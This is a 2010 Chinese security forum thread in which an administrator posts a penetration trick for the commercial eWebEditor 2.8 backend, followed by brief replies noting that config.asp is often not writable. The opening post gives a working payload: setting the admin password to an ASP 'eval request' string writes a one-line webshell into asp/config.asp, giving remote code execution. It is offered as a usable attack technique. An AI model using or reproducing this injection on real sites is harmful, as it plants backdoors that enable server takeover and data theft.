登录
注册
免费信息安全评估系统
注册邀请码购买
合作加盟
联系我们
帮助
高级
我的快捷通道
〓AK Team〓
公司主站
安全保镖
军密设备
免责条款
下拉
注册
用户名
UID
Email
社区应用
帖子
热榜
分享
记录
最新帖子
精华区
社区服务
道具中心
勋章中心
会员列表
统计排行
基本信息
到访IP统计
管理团队
管理操作
在线会员
会员排行
版块排行
帖子排行
标签排行
银行
■purple
■red
■green
■orange
■wind
安全工具{Network Security Tools}
最新漏洞{New Vulnerabilities}
安全审计
渗透工具
八卦趣闻{Hearsay}
业界新闻{News Postings}
隐藏
快速浏览
红科客服专区『HK Service Area』
安全保镖在线服务{Security Bodyguard Servic}
HK-IDAS在线服务{Intrusion Detection Alarm System Servic}
军密设备{Network Security Equipment}
前沿技术区
云计算动态
云技术研究
云安全讨论
网络技术区『Computer Network Technology』
电脑医生{Computer Doctors}
木马病毒{Trojan Knowledge}
服务器配置{Server Configuration}
网站SEO{Web SEO}
安全技术区『 Security Technology』
安全学堂{Safety class}
业界新闻{News Postings}
最新漏洞{New Vulnerabilities}
原创文章{Original article}
网络安全{Network Security}
渗透测试{Penetration Testing}
编程之道
安全工具{Network Security Tools}
动画教程{Animation Tutorial}
技术探讨{Technique Discussions}
〓A.K.T〓 献身使命,让网络因我们而安全!
0day Exploits
内部议事{Panel discussion}
娱乐天下『Entertainment Forum』
八卦趣闻{Hearsay}
荷塘月色{Prose fiction}
安全精英{Security Elite }
网络安全工作者互动平台{Interactive platform for network security workers }
论坛管理中心『Forum Administrative Center』
官方公告{Announcement}
站务受理{Service Management}
违规处理{Violation handling}
论坛活动{Activities}
红科网安信息安全团队-〓A.K.T〓
»
安全学堂{Safety class}
»
eWebEditor=>2.8 商业版 后台一句话木马
上一主题
下一主题
新 帖
主题 : eWebEditor=>2.8 商业版 后台一句话木马
使用道具┊
复制链接
┊
浏览器收藏
┊
打印
hsren
在线
出租半张床!赠送床伴!
级别: 管理员
UID:
4
精华:
10
发帖:
4122
安全币:
470558 枚
威望:
9592 点
贡献值:
9554 点
红科币:
65074 枚
好评度:
9624 点
在线时间: 2240(时)
注册时间:
2009-12-21
最后登录:
2010-09-09
楼主
发表于: 2010-07-29 16:09
倒序阅读
┊
只看楼主
┊
小
中
大
来源于
共享
分类
eWebEditor=>2.8 商业版 后台一句话木马
影响版本:=>2.8 商业版
攻击
利用:
登陆后台,点击修改
密码
—新密码设置为 1″:eval request(“a”)’
设置成功后,访问asp/config.asp文件即可,一句话
木马
被写入到这个文件里面了.
阐述:本文针对ewebeditor商业版本渗透小技巧,个人感觉能进后台可以改样式不必
数据库
插马了。仅供
参考
!
〓A.K.T〓 刺刀上带着思想 我们是龙的传人
回复
引用
举报
顶端
mad
在线
级别: 论坛版主
UID:
76
精华:
0
发帖:
18
安全币:
4949 枚
威望:
158 点
贡献值:
168 点
红科币:
407 枚
好评度:
158 点
在线时间: 155(时)
注册时间:
2009-12-22
最后登录:
2010-09-09
沙发
发表于: 2010-07-30 13:22
只看该作者
┊
小
中
大
有些config.asp都没有修改权限的 - -
回复
引用
举报
顶端
twangel
离线
级别: 助理安全工程师
UID:
3667
精华:
0
发帖:
4
安全币:
90 枚
威望:
4 点
贡献值:
4 点
红科币:
10 枚
好评度:
4 点
在线时间: 23(时)
注册时间:
2010-07-29
最后登录:
2010-07-30
板凳
发表于: 2010-07-30 15:17
只看该作者
┊
小
中
大
这个编辑器漏洞还是不少
回复
引用
举报
顶端
slinkwang
离线
级别: 助理安全工程师
UID:
3820
精华:
0
发帖:
12
安全币:
150 枚
威望:
12 点
贡献值:
12 点
红科币:
17 枚
好评度:
12 点
在线时间: 25(时)
注册时间:
2010-08-18
最后登录:
2010-09-07
地板
发表于: 2010-08-19 19:44
只看该作者
┊
小
中
大
好多aspconfig都没权限
回复
引用
举报
顶端
摩e低调
离线
级别: 助理安全工程师
UID:
2447
精华:
0
发帖:
15
安全币:
90 枚
威望:
15 点
贡献值:
15 点
红科币:
20 枚
好评度:
15 点
在线时间: 53(时)
注册时间:
2010-06-03
最后登录:
2010-09-05
4楼
发表于: 2010-08-22 07:52
只看该作者
┊
小
中
大
只可以说这程序漏洞太多了
回复
引用
举报
顶端
bigstar
在线
级别: 助理安全工程师
UID:
3316
精华:
0
发帖:
48
安全币:
414 枚
威望:
52 点
贡献值:
47 点
红科币:
57 枚
好评度:
52 点
在线时间: 659(时)
注册时间:
2010-07-15
最后登录:
2010-09-09
5楼
发表于: 2010-08-22 10:13
只看该作者
┊
小
中
大
这个编辑器就是祸害!
回复
引用
举报
顶端
上一主题
下一主题
红科网安信息安全团队-〓A.K.T〓
»
安全学堂{Safety class}
http://bbs.honkwin.com
访问内容超出本站范围,不能确定是否安全
继续访问
取消访问
描述
快速回复
限 100 字节
如果您提交过一次失败了,可以用”恢复数据”来恢复帖子内容
进入高级模式
加粗
字体颜色
背景颜色
插入链接
图片
验证问题:
我们的组织是? 正确答案:红科网安
按"Ctrl+Enter"直接提交
上一个
下一个